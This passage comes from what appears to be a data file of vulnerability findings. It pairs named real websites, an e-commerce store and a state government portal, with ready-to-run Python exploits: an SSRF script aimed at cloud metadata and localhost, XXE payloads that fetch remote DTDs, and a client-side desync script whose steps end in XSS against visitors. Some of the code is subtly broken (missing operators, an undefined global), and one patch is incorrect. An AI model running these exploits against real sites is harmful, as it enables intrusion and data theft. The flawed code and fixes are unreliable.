`https://www.daraz.pk/cart/` with the malicious `Referer` header.\n3. Observe server-side interaction with the specified endpoint.\n4. Use this behavior to probe internal infrastructure or access localhost-only services if applicable.\n\n## Impact\nAn attacker can leverage this SSRF to:\n- Scan internal networks inaccessible externally.\n- Interact with internal services such as metadata endpoints (e.g., cloud instance metadata).\n- Bypass firewall rules by using the server as a proxy.", "exploit_code": "#!/usr/bin/env python3\n\"\"\"\nPoC: Server-Side Request Forgery via Referer Header\nTarget: https://www.daraz.pk/cart/\nVulnerability: Referer header value used in server-side HTTP requests without validation\n\nAuthor: Security Researcher\nDate: 2026-04-22\n\"\"\"\n\nimport requests\nimport argparse\nimport sys\nimport time\n\nDEFAULT_TARGET = \"https://www.daraz.pk/cart/\"\nCOLLABORATOR_URL = \"http://your-collaborator.oastify.com/callback\"\n\ndef test_ssrf_via_referer(target_url: str, callback_url: str):\n \"\"\"\n Test SSRF by injecting callback URL in Referer header.\n Monitor for out-of-band interaction.\n \"\"\"\n print(f\"[] Target Endpoint: {target_url}\")\n print(f\"[] Callback URL (OAST): {callback_url}\")\n print(f\"[] Sending request with malicious Referer header...\")\n print(\"-\" 60)\n headers = {\n \"Referer\": callback_url,\n \"User-Agent\": \"Mozilla/5.0 (PoC-SSRF-Test)\",\n \"Connection\": \"close\"\n }\n try:\n start_time = time.time()\n response = requests.get(\n target_url,\n headers=headers,\n timeout=20,\n allow_redirects=True\n )\n elapsed = time.time() - start_time\n print(f\"[+] HTTP Status: {response.status_code}\")\n print(f\"[+] Response Time: {elapsed:.2f}s\")\n print(f\"[+] Response Size: {len(response.content)} bytes\")\n if response.headers.get(\"Server\") or response.headers.get(\"X-Powered-By\"):\n print(f\"[+] Server Header: {response.headers.get('Server', 'N/A')}\")\n print(\"\\n[!] IMPORTANT: Monitor your OAST/collaborator dashboard for:\")\n print(f\" • HTTP GET request to: {callback_url}\")\n print(f\" • Source IP should be the TARGET SERVER\")\n print(f\" • User-Agent may show application signature\")\n print(\"\\n[!] Advanced Payloads (for authorized testing only):\")\n print(f\" • Internal IP: http://169.254.169.254/latest/meta-data/\")\n print(f\" • Localhost: http://127.0.0.1:8080/admin\")\n print(f\" • Port scan: http://internal-host:PORT/\")\n return True\n except requests.exceptions.Timeout:\n print(\"[!] Request timed out - server may be filtering outbound requests\")\n return False\n except requests.exceptions.RequestException as e:\n print(f\"[!] Request failed: {e}\")\n return False\n\ndef test_internal_probe(target_url: str, internal_target: str):\n \"\"\"\n Attempt to probe internal resources (AUTHORIZED TESTING ONLY).\n \"\"\"\n print(f\"\\n[] Probing internal resource: {internal_target}\")\n headers = {\n \"Referer\": internal_target,\n \"User-Agent\": \"Mozilla/5.0 (PoC-Internal-Probe)\"\n }\n try:\n response = requests.get(target_url, headers=headers, timeout=15)\n internal_indicators = [\"EC2\", \"metadata\", \"root:\", \"password\", \"config\"]\n content_preview = response.text[:500].lower()\n if any(ind in content_preview for ind in internal_indicators):\n print(\"[!] POTENTIAL INTERNAL DATA LEAK DETECTED!\")\n print(f\"[+] Preview: {response.text[:200]}...\")\n return True\n else:\n print(\"[+] No obvious internal data in response\")\n return False\n except Exception as e:\n print(f\"[!] Probe failed: {e}\")\n return False\n\ndef main():\n parser = argparse.ArgumentParser(description=\"SSRF via Referer Header PoC - daraz.pk\")\n parser.add_argument(\"-u\", \"--url\", default=DEFAULT_TARGET, help=\"Target endpoint\")\n parser.add_argument(\"-c\", \"--callback\", required=True, help=\"Your OAST/collaborator URL\")\n parser.add_argument(\"-p\", \"--probe\", help=\"Internal URL to probe (optional)\")\n parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", help=\"Verbose output\")\n args = parser.parse_args()\n if not args.url.startswith((\"http://\", \"https://\")):\n args.url = \"https://\" + args.url\n print(\"=\" 70)\n print(\"SSRF PoC - Referer Header Injection\")\n print(\"Target: daraz.pk \| Authorized Testing Only\")\n print(\"=\" * 70 + \"\\n\")\n success = test_ssrf_via_referer(args.url, args.callback)\n if args.probe and success:\n test_internal_probe(args.url, args.probe)\n print(\"\\n[✓] PoC execution complete. Verify OAST logs for confirmation.\")\n sys.exit(0 if success else 1)\n\nif __name__ == \"__main__\":\n main()", "patch_code": "## Root Cause\nThe application processes the `Referer` HTTP header without validation and makes server-side HTTP requests to user-supplied URLs. This allows attackers to induce outbound requests to arbitrary domains.\n\n## Before/After Code Fix\nBefore:\n```python\nreferer = request.headers.get('Referer')\nrequests.get(referer)\n```\n\nAfter:\n```python\nallowed_hosts = {'trusted-domain.com', 'another-trusted.com'}\nreferer = request.headers.get('Referer')\n\nif referer:\n parsed_url = urlparse(referer)\n if parsed_url.hostname in allowed_hosts:\n requests.get(referer)\n else:\n raise ValueError(\"Host not allowed\")\n```\n\n## Defense-in-Depth Checklist\n- [ ] Implement a strict allowlist of trusted domains for outbound requests.\n- [ ] Block access from the application server to internal IP ranges (e.g., 127.0.0.1, 10.x.x.x, 192.168.x.x).\n- [ ] Sanitize and validate all user-controllable input influencing network requests.\n- [ ] Log and monitor outbound requests originating from the application server.\n- [ ] Disable unnecessary protocols (e.g., file://, gopher://) in HTTP client libraries.\n\n## Verification Steps\n1. Resend the original request with a `Referer` pointing to a Collaborator URL.\n2. Confirm that no outbound request is made to the external domain.\n3. Verify that requests to allowlisted domains still function as expected.", "context": "Severity: High (Certain)\nURL: https://www.daraz.pk/cart/ [Referer HTTP header]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/cart/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/cart/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/cart/ [name of an arbitrarily supplied URL parameter]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/catalog/ [Referer HTTP header]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/catalog/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/catalog/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/catalog/ [name of an arbitrarily supplied URL parameter]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/checkout/ [Referer HTTP header]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/checkout/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/checkout/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/checkout/ [name of an arbitrarily supplied URL parameter]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/customer/ [Referer HTTP header]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/customer/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/customer/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/customer/ [name of an arbitrarily supplied URL parameter]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/robots.txt [URL path filename]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/robots.txt [URL path filename]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/robots.txt [URL path filename]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wangpu/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wangpu/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/ [Referer HTTP header]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 3]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 3]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 4]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 4]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 5]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 5]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 7]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 7]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 3]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 3]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 4]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 4]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 5]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 5]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 6]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 6]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 3]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 3]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 4]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 4]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 6]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 6]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 7]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 7]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [Referer HTTP header]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [URL path folder 6]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [URL path folder 6]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [URL path folder 7]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [URL path folder 7]" }, { "vulnerability": "XML injection", "category": "injection", "exploit_steps": "## Reconnaissance\\n1. Identified the target endpoint: `https://www.daraz.pk/cart/`\\n2. Observed that the application accepts user-controlled input in URL path segments.\\n\\n## Vulnerability Confirmation\\n1. Submitted a test payload containing XML metacharacters to the URL path folder parameter.\\n2. Used the payload:\\n```xml\\n<frd xmlns=\\\"http://a.b/\\\" xmlns:xsi=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xsi:schemaLocation=\\\"http://a.b/ http://nri9jj4bzufvdb9cmcg9ytfmedk783w3k07qvf.oastify.com/frd.xsd\\\">frd</frd>\\n```\\n3. Detected interaction with the external domain (`oastify.com`), confirming that the server processes injected XML.\\n\\n## Exploitation Steps\\n1. Crafted malicious XML content referencing an attacker-controlled schema location.\\n2. Injected the payload via the vulnerable URL path segment.\\n3. Monitored for out-of-band interactions on the external domain to confirm successful injection.\\n4. Confirmed that the backend XML parser executed the injected content without proper sanitization.\\n\\n## Impact\\nThe vulnerability allows attackers to manipulate backend XML processing logic, potentially leading to unauthorized data access, service disruption, or further injection-based attacks like XXE.", "exploit_code": "#!/usr/bin/env python3\n\"\"\"\nPoC: XML Injection via URL Path Segment\nTarget: https://www.daraz.pk/cart/\nVulnerability: URL path segments incorporated into XML processing without sanitization\nDetection: Out-of-band interaction via XXE schema location\n\nAuthor: Security Researcher\nDate: 2026-04-22\n\"\"\"\n\nimport requests\nimport argparse\nimport sys\nimport urllib.parse\n\nDEFAULT_TARGET = \"https://www.daraz.pk/cart/\"\nOAST_DOMAIN = \"your-collaborator.oastify.com\"\n\ndef build_xxe_payload(oast_domain: str) -> str:\n \"\"\"\n Build XML injection payload with external schema reference for OAST detection.\n Uses xsi:schemaLocation to trigger outbound request.\n \"\"\"\n payload = (\n '<frd xmlns=\"http://a.b/\" '\n 'xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" '\n f'xsi:schemaLocation=\"http://a.b/ http://{oast_domain}/frd.xsd\">'\n 'frd</frd>'\n )\n return payload\n\ndef test_xml_injection(target_url: str, oast_domain: str, payload: str = None):\n \"\"\"\n Test XML injection via URL path segment.\n \"\"\"\n if payload is None:\n payload = build_xxe_payload(oast_domain)\n encoded_payload = urllib.parse.quote(payload, safe='')\n test_url = f\"{target_url.rstrip('/')}/{encoded_payload}\"\n print(f\"[] Base Target: {target_url}\")\n print(f\"[] OAST Domain: {oast_domain}\")\n print(f\"[] Testing URL: {test_url[:100]}...\")\n print(\"-\" 60)\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (PoC-XML-Test)\",\n \"Accept\": \"application/xml, text/xml, /\",\n \"Connection\": \"close\"\n }\n try:\n response = requests.get(test_url, headers=headers, timeout=20, allow_redirects=False)\n print(f\"[+] HTTP Status: {response.status_code}\")\n print(f\"[+] Response Length: {len(response.content)} bytes\")\n content_type = response.headers.get(\"Content-Type\", \"\")\n if \"xml\" in content_type.lower():\n print(f\"[!] Response Content-Type suggests XML processing: {content_type}\")\n error_patterns = [\"xml\", \"parse\", \"entity\", \"schema\", \"well-formed\"]\n response_text = response.text[:500].lower()\n if any(pattern in response_text for pattern in error_patterns):\n print(\"[!] Potential XML parsing error detected in response\")\n if args.verbose:\n print(f\" Preview: {response.text[:200]}\")\n print(\"\\n[!] IMPORTANT: Monitor your OAST dashboard for:\")\n print(f\" • HTTP request to: http://{oast_domain}/frd.xsd\")\n print(f\" • Method: GET \| User-Agent may reveal backend XML parser\")\n print(f\" • Source IP: Should match target server infrastructure\")\n print(\"\\n[!] Payload Breakdown:\")\n print(f\" • Element: <frd>\")\n print(f\" • Namespace: http://a.b/\")\n print(f\" • Schema Location: http://{oast_domain}/frd.xsd\")\n print(f\" • Goal: Trigger outbound HTTP request via XML parser\")\n return True\n except requests.exceptions.Timeout:\n print(\"[!] Request timed out\")\n return False\n except requests.exceptions.RequestException as e:\n print(f\"[!] Request failed: {e}\")\n return False\n\ndef test_alternative_payloads(target_url: str, oast_domain: str):\n \"\"\"\n Test alternative XML injection vectors.\n \"\"\"\n payloads = [\n f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://{oast_domain}/xxe\">]><foo>&xxe;</foo>',\n f'<!DOCTYPE foo [<!ENTITY % xxe SYSTEM \"http://{oast_domain}/payload.dtd\"> %xxe;]>',\n f'<?xml-stylesheet type=\"text/xml\" href=\"http://{oast_domain}/style.xsl\"?>',\n ]\n print(f\"\\n[] Testing {len(payloads)} alternative XML payloads...\")\n for i, payload in enumerate(payloads, 1):\n encoded = urllib.parse.quote(payload, safe='')\n test_url = f\"{target_url.rstrip('/')}/{encoded}\"\n try:\n resp = requests.get(test_url, timeout=10, headers={\"User-Agent\": \"PoC\"})\n print(f\" [{i}] Status: {resp.status_code} \| Len: {len(resp.content)}\")\n except:\n print(f\" [{i}] Failed to send\")\n\ndef main():\n global args\n parser = argparse.ArgumentParser(description=\"XML Injection PoC via URL Path - daraz.pk\")\n parser.add_argument(\"-u\", \"--url\", default=DEFAULT_TARGET, help=\"Target base URL\")\n parser.add_argument(\"-d\", \"--domain\", required=True, help=\"Your OAST/collaborator domain\")\n parser.add_argument(\"-p\", \"--payload\", help=\"Custom XML payload (optional)\")\n parser.add_argument(\"-a\", \"--alternatives\", action=\"store_true\", help=\"Test alternative payloads\")\n parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", help=\"Verbose output\")\n args = parser.parse_args()\n if not args.url.startswith((\"http://\", \"https://\")):\n args.url = \"https://\" + args.url\n print(\"=\" 70)\n print(\"XML Injection PoC - URL Path Segment\")\n print(\"Target: daraz.pk \| Authorized Testing Only\")\n print(\"=\" * 70 + \"\\n\")\n success = test_xml_injection(args.url, args.domain, args.payload)\n if args.alternatives and success:\n test_alternative_payloads(args.url, args.domain)\n print(\"\\n[✓] PoC execution complete. Verify OAST logs for XML parser interactions.\")\n print(\"[!] Remediation: Disable external entity resolution in XML parsers.\")\n sys.exit(0 if success else 1)\n\nif __name__ == \"__main__\":\n main()", "patch_code": "## Root Cause\\nThe application incorporates unsanitized user input directly into XML documents or messages processed by the backend. Specifically, the URL path segment is used without validation or encoding, allowing attackers to inject arbitrary XML structures.\\n\\n## Before / After Fix\\n### Before\\n```python\\nurl_segment = user_input # Direct usage of untrusted input\\nrequests.get(f\\\"https://www.daraz.pk/cart/{url_segment}\\\")\\n```\\n\\n### After\\n```python\\nimport html\\nurl_segment = html.escape(user_input) # Encode special XML characters\\nrequests.get(f\\\"https://www.daraz.pk/cart/{url_segment}\\\")\\n```\\n\\n## Defense-in-Depth Checklist\\n- [ ] Validate all inputs against strict allowlists.\\n- [ ] Sanitize special characters (<, >, &, \\\" , ') using entity encoding.\\n- [ ] Disable external entity resolution in XML parsers.\\n- [ ] Use secure XML parsing libraries with built-in protections.\\n- [ ] Implement WAF rules to detect XML metacharacter patterns.\\n\\n## Verification Steps\\n1. Re-submit the original XML injection payload.\\n2. Confirm that the payload is either rejected or safely encoded.\\n3. Monitor logs for blocked or sanitized input attempts.\\n4. Perform regression testing to ensure functionality remains intact.", "context": "Severity: Medium (Certain)\nURL: https://www.daraz.pk/cart/ [URL path folder 1]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/catalog/ [URL path folder 1]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/checkout/ [URL path folder 1]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/customer/ [URL path folder 1]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/robots.txt [URL path filename]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wangpu/ [URL path folder 1]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/ [URL path folder 2]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 2]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 3]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 4]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 5]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 7]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 3]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 4]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 5]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 6]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 2]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 3]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 4]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 6]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 7]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [URL path folder 2]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [URL path folder 6]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [URL path folder 7]" } ]
69f1680b59a6632dae07de79	https://cmogujarat.gov.in/en	2026-04-29T02:08:11.383447+00:00	[ { "vulnerability": "Client-side desync", "category": "miscellaneous", "exploit_steps": "## Reconnaissance\n1. Identified the target endpoint as `https://cmogujarat.gov.in/en`.\n2. Observed that the server supports HTTP/1.1 with `Connection: keep-alive`, indicating potential for connection reuse.\n3. Noted that the server does not properly handle delayed POST request bodies, leading to desynchronization.\n\n## Vulnerability Confirmation\n1. Sent a POST request to `/en` with `Content-Length: 0` and delayed the actual body transmission.\n2. Confirmed that the server waits for the body but does not close the connection upon timeout.\n3. Verified that subsequent payloads are interpreted as new requests, confirming client-side desync behavior.\n\n## Exploitation Steps\n1. Craft a POST request with `Content-Length: 0` and withhold the body.\n2. Send the withheld body after a delay, causing it to be interpreted as a new HTTP request on the reused connection.\n3. Inject malicious content such as XSS payloads into the desynchronized request.\n4. Trick a victim's browser into reusing the connection (e.g., via a malicious link or iframe).\n5. The injected payload executes in the victim’s browser context, achieving XSS.\n\n## Impact\nSuccessful exploitation leads to client-side desynchronization, enabling XSS without direct user interaction beyond visiting a crafted page. This can result in session hijacking, defacement, or phishing.", "exploit_code": "#!/usr/bin/env python3\n\"\"\"\nClient-Side Desync (CSD) Proof of Concept\nTarget: https://cmogujarat.gov.in\nVulnerability: CWE-444 - Inconsistent Interpretation of HTTP Requests\n\nAuthor: [Your Name/Organization]\nDate: [Date]\nPurpose: Responsible Security Research & Disclosure\n\nUSAGE:\n python3 csd_poc_cmogujarat.py --host cmogujarat.gov.in --probe UNIQUE_STRING\n\nNOTE: This script is NON-DESTRUCTIVE and uses a unique probe string for safe verification.\n\"\"\"\n\nimport socket\nimport ssl\nimport argparse\nimport sys\nimport random\nimport string\nimport time\nfrom urllib.parse import urlparse\n\n# ANSI color codes for output\nclass Colors:\n RED = '\\033[91m'\n GREEN = '\\033[92m'\n YELLOW = '\\033[93m'\n BLUE = '\\033[94m'\n RESET = '\\033[0m'\n BOLD = '\\033[1m'\n\ndef generate_unique_probe(length=12):\n \"\"\"Generate a unique random probe string for safe testing\"\"\"\n return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))\n\ndef create_socket(host, port, use_ssl=True):\n \"\"\"Create and return a connected socket\"\"\"\n if use_ssl:\n context = ssl.create_default_context()\n context.check_hostname = False\n context.verify_mode = ssl.CERT_NONE\n sock = context.wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM), server_hostname=host)\n else:\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.settimeout(10)\n sock.connect((host, port))\n return sock\n\ndef send_initial_post(sock, host, path, probe_marker):\n \"\"\"Send the initial POST request with Content-Length: 0\"\"\"\n request = (\n f\"POST {path} HTTP/1.1\\r\\n\"\n f\"Host: {host}\\r\\n\"\n f\"User-Agent: Mozilla/5.0 (Security Research PoC)\\r\\n\"\n f\"Accept: text/html,application/xhtml+xml\\r\\n\"\n f\"Connection: keep-alive\\r\\n\"\n f\"Content-Type: application/x-www-form-urlencoded\\r\\n\"\n f\"Content-Length: 0\\r\\n\"\n f\"\\r\\n\"\n )\n print(f\"{Colors.BLUE}[+] Sending initial POST request with Content-Length: 0{Colors.RESET}\")\n sock.sendall(request.encode())\n response = b\"\"\n try:\n while True:\n chunk = sock.recv(4096)\n if not chunk:\n break\n response += chunk\n if b\"\\r\\n\\r\\n\" in response and len(response) > 1024:\n break\n except socket.timeout:\n print(f\"{Colors.YELLOW}[!] Timeout receiving initial response (expected behavior){Colors.RESET}\")\n return response.decode('utf-8', errors='ignore')\n\ndef send_desync_payload(sock, host, path, probe_string):\n \"\"\"Send the 'body' that the server will interpret as a NEW request\"\"\"\n desync_request = (\n f\"GET /{probe_string} HTTP/1.1\\r\\n\"\n f\"Host: {host}\\r\\n\"\n f\"User-Agent: CSD-PoC-Client\\r\\n\"\n f\"X-CSD-Test: {probe_string}\\r\\n\"\n f\"Connection: close\\r\\n\"\n f\"\\r\\n\"\n )\n print(f\"{Colors.BLUE}[+] Sending desync payload (will be interpreted as new request){Colors.RESET}\")\n sock.sendall(desync_request.encode())\n time.sleep(1)\n response = b\"\"\n try:\n sock.settimeout(5)\n while True:\n chunk = sock.recv(4096)\n if not chunk:\n break\n response += chunk\n except socket.timeout:\n print(f\"{Colors.YELLOW}[!] Timeout reading desync response (may still be vulnerable){Colors.RESET}\")\n except Exception as e:\n print(f\"{Colors.YELLOW}[!] Error reading response: {e}{Colors.RESET}\")\n return response.decode('utf-8', errors='ignore')\n\ndef analyze_response(initial_response, desync_response, probe_string):\n \"\"\"Analyze responses to determine if vulnerability exists\"\"\"\n print(f\"\\n{Colors.BOLD}{'='70}{Colors.RESET}\")\n print(f\"{Colors.BOLD}ANALYSIS RESULTS{Colors.RESET}\")\n print(f\"{Colors.BOLD}{'='70}{Colors.RESET}\\n\")\n vulnerable = False\n if \"200 OK\" in initial_response or \"302 Found\" in initial_response:\n print(f\"{Colors.GREEN}[✓]{Colors.RESET} Initial POST request received valid response\")\n else:\n print(f\"{Colors.YELLOW}[!]{Colors.RESET} Initial POST response unexpected (may affect test reliability)\")\n if probe_string in desync_response:\n print(f\"{Colors.GREEN}[✓]{Colors.RESET} Probe string '{probe_string}' found in response\")\n 